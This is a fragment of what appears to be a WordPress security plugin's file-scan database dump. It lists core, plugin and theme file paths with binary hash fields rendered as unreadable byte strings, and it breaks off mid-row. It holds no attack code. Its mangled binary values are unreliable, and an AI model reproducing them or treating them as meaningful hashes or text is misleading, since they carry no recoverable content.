�\r�\0m�΋;v�x','',0,'?'),('MР\0�A���9Q�+��','wp-includes/js/admin-bar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�၈��n�&�a1a\0','(L��<����K�i�-��U4�Wܸ` ��rl$�','',0,'?'),('M�;C�����8Yyﲏ','wp-includes/js/twemoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���װ�aL/S��T','e�dimԺm\Z$V��v�%	���FO��aK\rŇS','',0,'?'),('M�l}�^�Gi��*z','wp-includes/wp-includes/js/jquery/ui/effect-clip.js',0,']02[W�0V1�Q',']02[W�0V1�Q','�|�JR?�]ϭ̺\\T�v���� ��5t����$','',0,'?'),('M���I�M��rD��-','wp-includes/post-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a^E�@�p�\'��?�','N�O�[wȐ��	��&Ќ�!P��Qe��s','',0,'?'),('N7�A�\0�nnV�֑�','wp-content/plugins/wordfence/images/checkbox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��G\r�6|􈘀\'','��y~`w(j�~�=뤼&��ݴ���Q>`^�x','',0,'?'),('N=�f�>$K���H�T�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?�G{�����g','ĀР<W�;-\Z񀍙��(C+�,M���U��W6','',0,'?'),('NG�a:�Uf�Keu��I','wp-content/themes/sg-window/inc/css/customize.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�́�x\0{�#M�','�V_�0�U�Ts�ʫ�UT�Nn\r��9����','',0,'?'),('Ni�~	�`���W�E','wp-content/plugins/wordfence/lib/wfAlerts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�(A��|�ϯy��L','�\'_�;?�|US5d}K/+,I!|��t','',0,'?'),('N|�‡Jв�zn�sw','wp-includes/pluggable-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���\"�j��2�ߖ','��U����=����co��=t1�-\\�\r�=','',0,'?'),('N���W[��@��t)�','wp-content/plugins/wordfence/css/iptraf.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�bf.��\n�V[�xPh','J��-@ ]�-��	�cq���WQ$8�','',0,'?'),('N�3�j@pu5����^��','wp-includes/js/tinymce/skins/wordpress/images/more.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\nm\0;�˫�z','$��v��o^���U� �A\0���:�\\C�u��','',0,'?'),('N�p�`�#bJ�Ȅ�','wp-includes/wp-includes/blocks/nextpage/block.json',0,'��{�~_کk_�l\n��','��{�~_کk_�l\n��','�vC.z-�N�Y���	�C�<����ccl','',0,'?'),('N����7�-��_','wp-includes/wp-includes/class-wp-customize-nav-menus.php',0,'B�8û�Td�h9�\Z','B�8û�Td�h9�\Z','��g�n\\�y|�TR�xF����\\��A��&7֏�d','',0,'?'),('N��HV����}�4G','wp-admin/css/customize-widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�\"?.�i�!�qe�o�','ߟ�d��~o�K�C��ѰE��˛)5��.9�A','',0,'?'),('N��ً�0�`�+�3d','wp-includes/wp-includes/ID3/module.audio-video.matroska.php',0,'^w�\'Z��Do4d].�','^w�\'Z��Do4d].�','bA�O����C���r5Y\0��se�A�ʏ0���','',0,'?'),('N��lI���V�,�Z�','wp-content/plugins/wp-cerber/assets/flags/hn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;Ҿ����:��','e��{9�[�۫�p��Nk83)t����$<5�','',0,'?'),('N�2�#��r�R�~�	','wp-includes/wp-includes/block-patterns/large-header.php',0,'�`���3��\0�]j6?>','�`���3��\0�]j6?>','��b�`&h�2��)V�KF}Ո�m�?*f�搭','',0,'?'),('O	��S����#�Yi�v','wp-admin/includes/class-wp-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!T<zs�6�C�?r\r�','�hŽ�[��в�u�\0Jh=�$�6L)c^f��zb��','',0,'?'),('O�z��̟p*�\0','wp-includes/wp-includes/class-wp-block.php',0,'�ݕ��Fԯ�8f�6��','�ݕ��Fԯ�8f�6��','�����y{���tl+RJ���N��\nj�R','',0,'?'),('O�ҽPT�^�4~��B','wp-includes/css/dist/editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k����`�\0d���‘','�2��*Pj%R4{?��M�rH�:�����b�~','',0,'?'),('O =(�:��<�	�1F�','wp-includes/class-wp-feed-cache-transient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��?^>��O�',':��;h�!xE�z��P+�dV�0����D�','',0,'?'),('O+���[�IB���m�m\'','wp-content/plugins/wordfence/images/wf-central-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�(��VѤ���','\0{\r�ߘ�J/� �^�+��,��S������','',0,'?'),('O/�s䣗�{��zZ�_7','wp-includes/wp-includes/js/mediaelement/mejs-controls.svg',0,'�^yq+�S%��y','�^yq+�S%��y','������h���A3L�:��\'1�ꁠ�\\�','',0,'?'),('O0��KQH���a�a��','wp-includes/wp-includes/js/dist/dom-ready.min.js',0,'w�I�k���o���^?\n�','w�I�k���o���^?\n�','��\0.����ɕ�`�	�Ʃ��P���','',0,'?'),('O4�dzWQ�\0��R��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Lj���\"C�ix���','��x眪!����}�\Z�����W����d','',0,'?'),('O:�3?��g�:��','wp-content/themes/sg-window/genericons/genericons/Genericons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','→��(��7k�j','ɞ����1��X��*��*��y��h���s','',0,'?'),('O=om��,��a�@','wp-includes/wp-includes/css/media-views-rtl.css',0,'~��M]�1f�D,��>�','~��M]�1f�D,��>�','�mA �7N�/z}��;��e��r�cs�#sW','',0,'?'),('O=��h�\0}O��rL�b','wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�U��~�L5�@\ZVU','/�r��T�rm����G�с�\r�%�e\r��|�[','',0,'?'),('OJ�?�Cz�V�^2���1','wp-content/plugins/wp-cerber/assets/flags/mr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��Y��kF���@','���c���n�foaYd��M@�0O��DI\n��x','',0,'?'),('OS�Y�Wz!8�ʣj�','wp-content/plugins/wordfence/views/gdpr/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\atn}#��\r��׈','ÝE��F�@kh��V�b��w6��~�#kC','',0,'?'),('OlqCcێ���������','wp-admin/css/forms-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�`�����kث=','g��<�������ƃ˂�s��{5Ϝq��6�','',0,'?'),('Oy�}Ma���_��I','wp-includes/Requests/Exception/HTTP/504.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�̪Db� ��*�','�<����!B�|$k���݈�# �e�i%0','',0,'?'),('O�潼m$��݋&_','wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�F��\n�D��ҭ�','2\"�ޡ�4e���Kӗ�p!w#�����1���,','',0,'?'),('O�T��vyCˊX^��b','wp-includes/wp-includes/js/mce-view.js',0,'2s�H��ّ;[���	s','2s�H��ّ;[���	s','��8`9ڰn�-.�	H�Dp��k+�γ��bI','',0,'?'),('O��\\���P5��{�R�','wp-admin/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9=�C���;��w^�X','�_\n�W����o�0w�����7��`=�r��','',0,'?'),('O�[0{�ë ��/�¼','wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')e��f�#�`P�~7�n','-m��z��n�N�F�E\0ѭ\\vq�sL?�Z\Z��','',0,'?'),('O����&�r�蓏�� ','wp-admin/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.\"�\Z���&T;�ݫ��','c�tg�H���u����L=?q�u���EA','',0,'?'),('O����R�r����D�?�','wp-admin/js/postbox.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���J��z%p','�qG%`�3E�:j~^�\ZҌ��;,��','',0,'?'),('O�Q�^�‡�B�E�Ӣ','wp-includes/wp-includes/ID3/module.audio.ogg.php',0,'�_2��\n$9��`m85','�_2��\n$9��`m85','�6%u?E�M��l�Ȑ�@5vr�[�j\'t�H��f','',0,'?'),('O�&\0K�n�mo���O','wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.min.js',0,'�Er�HD��D��3��@','�Er�HD��D��3��@','<����o�@�:����-�Eg���)6^Ѽ\'��','',0,'?'),('O����y ��k	b�','wp-admin/css/customize-nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lU�e�H�Y%U�n��','AK希T�YL�6��~8����w,9�ˉ+�R�f','',0,'?'),('O�����HI!K!0[�','wp-content/plugins/wordfence/lib/menu_scanner_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�����D�X�;�I','���C�&YB�p_d$�,+������Ŝ���J��','',0,'?'),('O�5e���;hz�w@�W','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z<����{~G�f(','��,ב[\Z���@�+���?x���P��А�','',0,'?'),('O��O�M_K7�n��','wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*5���^gG�o<NN','5�\'4ϣ�j3Ò�NjX�CU�!�����]~','',0,'?'),('O�hu�G���&\0�L�','wp-includes/Text/Diff/Engine/native.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S���\r��$�T','S��\04�v@�ű`�DG V�u�e�R��B竇3�','',0,'?'),('P��H��Z`�=���','wp-includes/blocks/pullquote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�1��ݗz��sK�c','v�K�N��`\ZX�n$`7P��Y6�~ON�1�','',0,'?'),('P�bw�=����i��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\Z��Iw5AlLۢ�','��K{�8��fl��7s�Rh���嗋��I','',0,'?'),('P	�l���ߓ��R�Y','wp-includes/wp-includes/js/jquery/ui/sortable.min.js',0,'M��:�7)�r�ӈ�k','M��:�7)�r�ӈ�k',')��jjc�D�߰�%^B���� �&�ٶ�Ƀ�','',0,'?'),('P�/:��̮�҉���H','wp-content/plugins/wordfence/waf/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�З:4�z��M�E�7�','�!8�s���w�#�)��\r�<�r|2y*LS^','',0,'?'),('PE۫�7r|oI�6��>','wp-includes/js/backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`ft7\\J�*��4a','j�˯�}j�$��@�č��� n%Q|�l��','',0,'?'),('P ���NtD�݌�n\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��!�,��^�q�','X߇p�Ք�Z��Љ�ֱo�\r�=˸<!�~�3�','',0,'?'),('P&_#�\'�zT���s','wp-includes/Requests/Exception/HTTP/417.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bpj�hO^�c\\G #','���L�T��Ҙ$xDs�^�h_!kC�\"1\'��_�','',0,'?'),('P\'�(���?+�z��$�','wp-admin/js/postbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$;�9H�S_��7���','��`���R���f!Rd�<����Q�� ��GIJ','',0,'?'),('P\'�s#+�#���\r^','wp-includes/wp-includes/blocks/subhead/block.json',0,'f�L[� ���3�','f�L[� ���3�','��DX�+C�]�D�$W+�f��yi><�\\�4��','',0,'?'),('P6��u��[tvJ�Y','wp-includes/wp-includes/js/customize-views.min.js',0,'�Hӷ�-\\Me���','�Hӷ�-\\Me���','�b����L��-���9wlo��y�$+�Y\Zޘ�N','',0,'?'),('P73o�	��\0�=��','wp-admin/js/word-count.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rffB)��������','��6j�,A�ުǭs�D��eC�z�&���\n���','',0,'?'),('PJ�~]��; ��`y','wp-includes/widgets/class-wp-widget-media-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dCa�*C^e~OriA�','�L�/�T|����w�pEf1�Ln��!y���','',0,'?'),('PK��2�I��)��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3[�h�k�da4�p','�&�!�7^�@��9���N�BT�����*8�','',0,'?'),('P��[�D�XP��a���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;u‰�S���l','�M>:\r�&�V��`�\Z:�O0�Sv;\0��V�w','',0,'?'),('P��iz�t�a�}�a','wp-admin/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z\\���@�ju��W�=','�%Z��j��\Za��� ��Dy��b����','',0,'?'),('P�-�)\041��]���','wp-includes/wp-includes/js/dist/i18n.min.js',0,'pMp�s�Rӷ_�_','pMp�s�Rӷ_�_','+��d8/�]��jB���2?��q�����N','',0,'?'),('P��\n�e���u�\"�','wp-includes/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��B�c��f4�[�\\','\'�{~���V�A(�p�X���ȵ�E/�','',0,'?'),('P��y����Xn��','wp-content/plugins/wp-cerber/assets/flags/an.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B����\ZEs�F\r�8','���Z��iLz�q`�{ۯۇn	�fN�zY3i�','',0,'?'),('P�a�l&��:�)V�I�','wp-content/plugins/wp-cerber/assets/flags/ax.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l���ho��%>��T�','Ku*Q(�g�iC�`i0�����ȇ�R.�c���','',0,'?'),('P�@���;b<\n�c�','wp-includes/class-wp-oembed-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\";�r��\Z(FAU','�p���[����j$8�7�zI\\�!y�<G�4\r���','',0,'?'),('P�M�\Z�I̸�ݭY`r','wp-content/plugins/wordfence/lib/wfHelperString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Euƻ\\S w?,�_�L`','��� ��i�Lƛw���6�_���,n�2S��Zh)','',0,'?'),('P�0{����ֱm#','wp-includes/wp-includes/css/dist/block-directory/style-rtl.min.css',0,'\n��J�cW�&��Y�','\n��J�cW�&��Y�','i�+W�M�E4�\n�#S�-^�?�ݻ��,�9','',0,'?'),('P�1$���\\*�C','wp-admin/images/stars-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A���#�S�Me.^','[��耿�_(\rh���Y���T��qZ��','',0,'?'),('P��/ն�؉N��\r7k','wp-includes/wp-includes/random_compat/random_int.php',0,'*�RX�Ǡ�ͤB�n6','*�RX�Ǡ�ͤB�n6','8�-%���s�`N��a�L	�L�M�ʫ�)�','',0,'?'),('Q;���(����Mp*�','wp-admin/js/widgets/media-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PQ�{���97@�]տ','PP&`@�U��}�{�������_V��,HCV','',0,'?'),('QM9�K7�ܑlG��','wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',0,'R�*L�TG��4%P���','R�*L�TG��4%P���','-������n�F�J�&T�P�o\\ϓ\\����2���','',0,'?'),('QT���*�f�P��.�','wp-admin/includes/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Հѷ������#','+B�0j$2f�j�i�\Z���)HٗO=�\\%�','',0,'?'),('QY��1�Tl��Vr<','wp-includes/js/customize-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"r�<`����D��','b2�M��!o�;�-�veq��\\f�]l����:','',0,'?'),('QuoPX��\0��Sڞ','wp-admin/images/bubble_bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�g<ć�I����0','\'+u�W�`-A�����S\'�}S~S��b���','',0,'?'),('Q��cm�uX\Z3�B+��X','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VD�\'\'���C��b�x','fkYQ@Y�^,\n�?�J�Y���\0�C�ł��','',0,'?'),('Q�ՔY�k��`4��E�','wp-includes/wp-includes/js/jquery/jquery.hotkeys.min.js',0,'�S!}EU�\\b�g�h��=','�S!}EU�\\b�g�h��=','\ZJ��]�x ծT���c�0n�9  +V�k�','',0,'?'),('Q�t��$oGoE�$�:�','wp-content/plugins/wp-cerber/assets/flags/sy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oi�&\0�0$l6��','�/<7�\n�W�6�H~�G�K \"�L���','',0,'?'),('Q��6K4������H','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bv�J�Y|���O[k��','R\r��½]����(%^V�z �hSG�LSO�','',0,'?'),('Q� `�7������%�','wp-content/themes/sg-window/inc/css/image.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���}.����q�','&��A�C~v�\Z��!�jK����&z�5u8�','',0,'?'),('Q��-�C-]C����','wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����O�����81','���v$�͏���,��5�6X�~Xʧ��ℐ���','',0,'?'),('Q�`���8�M�8','wp-admin/press-this.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'xq��>�/���EQ�L','>��k�(���B�������h\\�ѫ͜:','',0,'?'),('Q�.ì�\\���XeOI','wp-content/plugins/wordfence/views/dashboard/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','դ��q�.�\rl4G�','�˾�6�/(���OE||\'�郊�$emԬ!�','',0,'?'),('Q�����l��g�-��','wp-admin/js/comment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ur�|,:]�_��#','d\0��\\w�|	��w��W?�3 gYaX~]�-�','',0,'?'),('R�v5��W6�`�ھ�','wp-includes/css/dist/nux/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cڷ�\r�\\Kn]\nO�','h��iu���E���UJc]���\\d`M\Zqi	�սq','',0,'?'),('R3�Us�3��}T��','wp-includes/js/autosave.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0|w{���5l�D\nө��','����U��m�����vk�}�n��V�#IH�','',0,'?'),('RQ�b7f�� |~ۓ�(','wp-admin/js/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S|�^�p9Y\\\re*.�2',',/;�{�M,��z���+��o{�c�|u��b\"_Q','',0,'?'),('Rj�q�Iӏ\Z�Y&�','wp-includes/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0\rJ`X�\"8�by','oHi��Y�N3	>����_����J�,���S^','',0,'?'),('Rmj���\\X����ָQ�','wp-content/plugins/wordfence/css/wf-font-awesome.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��M��ً�V���:','997dI�Ou�-����%enԻ�1�����I','',0,'?'),('R�b�:Z�K��L�','wp-admin/js/application-passwords.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nv�>4��~,�aڛ858','�\ZKok����ӗi0˓���RI��c\0�Oh','',0,'?'),('R�x�4Mp@�9u\n֊ p','wp-includes/images/wpspin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('R��|Rx/�bzn9\0*�J','wp-admin/includes/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L����S�0���','S[��n��+�𙒽�C�w�C�쌑�)n�d','',0,'?'),('R�\\SC�|ju�9��A','wp-includes/js/media-grid.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BN5�d��b�i^&ޖn','��$�#�& v��PS�u{Z�)XÜ����ֱ�','',0,'?'),('R¥�����Le�q	�&�','wp-admin/js/user-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Za�K�=���l�s�','�>�n�\"S����q��t�\"qz��ي�*pZ#�+x','',0,'?'),('R�H\r0��!�d�?c&','wp-includes/widgets/class-wp-widget-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bb��w�8�[�&�-Y','�@�Ѩ��pw�x�QX��}\r�y��|��?��','',0,'?'),('S�T��ʝI�o��x!','wp-includes/wp-includes/class-wp-term.php',0,'��Q5��ׄXZ��','��Q5��ׄXZ��','�}Gj)p�����O�7�٠fݒ���ፎ�Y�p','',0,'?'),('S#A��c]����z\'�','wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',0,'�V�̦���QK�#΀','�V�̦���QK�#΀','�Q��]+N��[m^̋B���1��Ϗ��}�','',0,'?'),('S.FȫA�j���(�:','wp-includes/js/hoverIntent.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�m���\n8��	�','�)�K���%A�Z&�y�`M��U!�i:A�[�','',0,'?'),('S0�־��K/17u���','wp-includes/js/jquery/ui/selectmenu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Wj*m��Es�','�l$1dT��z֬�H\r���*�xQ��,e4e','',0,'?'),('SDνy��P�d.���','wp-includes/wp-includes/SimplePie/Copyright.php',0,'k��>�����ԪQ','k��>�����ԪQ','�i��%�ܴ��E�^g���2�z,�@�Q��V','',0,'?'),('SX+7�1?���-','wp-includes/js/jcrop/Jcrop.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��7e�����Q�%K','!��@��X�7JŃ��p�3K�;S*!���L','',0,'?'),('S`{_�~?+�ߵ�{�','wp-includes/wp-includes/class-wp-network.php',0,'�ZM�ٟ�:�l\"pdΛ�','�ZM�ٟ�:�l\"pdΛ�','�%q2���Ӑ�F���JȑR~҃i���`;�>�','',0,'?'),('Sb��R����ϕ�m�b','wp-includes/wp-includes/PHPMailer/SMTP.php',0,'�,k�)����X','�,k�)����X','��>��|F��j�e�<;E�Tr�ۭe��wO','',0,'?'),('Sj�~6��{�����X','wp-admin/css/colors/modern/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��gRȺ#c�٩�','���?~�o,cy2�P��on��`����ϻ}u8:H','',0,'?'),('SzW��NKUS��','wp-includes/blocks/calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�����cE8,\n','�O%�7ܧ�^V�x��n~���\r�8���i.3-','',0,'?'),('S�C��i1ۭ�j�','wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p��\\E���(��i','4�O���+o�c.`‹_����U��>�8��','',0,'?'),('S����p�>��Wr�YE','wp-comments-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.K��OQ ��ga��','LJ��h��`*�dr�}�6-�߁P�Q��{�','',0,'?'),('S�dlz�s�V7','wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�~МI�XP/��$','�s�em��/�;��֘���� aZ�H`�g3','',0,'?'),('S����K^c~†“�','wp-content/themes/sg-window/img/icons/small/aim.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�|���6��','�M�y��V��G�ó���|׽O+���@� K','',0,'?'),('S�_��@8Q�̞�����','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js',0,'�-\\�d��oG��\n��2','�-\\�d��oG��\n��2','Sa)����ʗn&B��V�~��11�\'w�(','',0,'?'),('S��t� ��J�9���G','wp-includes/css/dist/block-directory/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IF	�1�P�������','��hbAnIJ��\'��o�;~p%�Z$.\'����-4','',0,'?'),('S���\n�pލG%�','wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('S��&�az8�Jض9�','wp-includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��AĢ<ݤ9�fK:','�6��-�Պ��涫9����W\"\'�|w�w~�E\n','',0,'?'),('S�r([~T<�ρa���','wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.js',0,' C��ȭ?d�{׭V��',' C��ȭ?d�{׭V��','���B��R�\0�!�䄚����Q�����\'5w','',0,'?'),('S�^�7jK5I6K�2!','wp-includes/Requests/Cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��4�G��FdW(�','1׋��0*�E�3:/��2p��կ�\0K2^�(','',0,'?'),('S��0ӽ\nq����\n�5','wp-content/plugins/wordfence/modules/login-security/css/colorbox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<��w\ri�컎vL*x�','�N�b���\r̎�/?+\'��bi\'�W�$@�i\0','',0,'?'),('T�r���~�W]�','wp-includes/class-wp-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J0n�N.��yƪb��','�}�u\0tE\n�&���yt2���B���','',0,'?'),('T!���ǷCee��R','wp-includes/wp-includes/js/dist/autop.js',0,'߭Φ� ��$=\Z��','߭Φ� ��$=\Z��','��-�����ي�&%����~.+oVr�,>꾥W','',0,'?'),('T!��+�g�r�w��76','wp-content/themes/sg-window/genericons/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�Mi���Hj���JBc','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('T.�փFmK[���t','wp-content/themes/sg-window/inc/widget-tags-naigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6?���C��<0X��K��','Ӑp[�M��A�>�gd�Wm�1,�{\0Q�','',0,'?'),('T6K?���s� �7(�','wp-includes/customize/class-wp-customize-sidebar-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vj��B���ر���q','��{#�i�`��\0���j���` pǍ+�fF�','',0,'?'),('T:�Dğ.&l�\Z?�&�A','wp-content/plugins/wp-cerber/assets/flags/in.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�weIɻ�j籏��{\n','��4x�\n��<~�z����{��V��Я\"N�','',0,'?'),('T;�r�UP.���]��i','wp-includes/wp-includes/images/admin-bar-sprite.png',0,'S���:�W���^','S���:�W���^','��rN!�`VO�c��K��viՀ{Fn\Z��le','',0,'?'),('T?�?:q׮P��ah\'��','wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���AN�X[`h\0����','�\"xI�B6�E?�����i�\'26�5y/��','',0,'?'),('TL�`��xX �l���','wp-includes/wp-includes/images/smilies/icon_eek.gif',0,'�/I ���x�)�(\"��','�/I ���x�)�(\"��','�8�����K҇���4������!��:ʰ','',0,'?'),('TM����l����','wp-admin/includes/class-wp-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O\'<r,x�ib��$','MqރR�3=E�8C�@^��@ò�~�qv�M���','',0,'?'),('Te�\Z���¸M��,�','wp-includes/wp-includes/js/tinymce/themes/inlite/theme.js',0,'4O��DIc`��EJ','4O��DIc`��EJ','p�v�T5Z>j��j�\0\0��f��xa/g=�&�','',0,'?'),('Tw��=��+�6����','wp-includes/js/tinymce/wp-tinymce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����--��T�J�;','��O���w�:�V�^�w�^[\n�	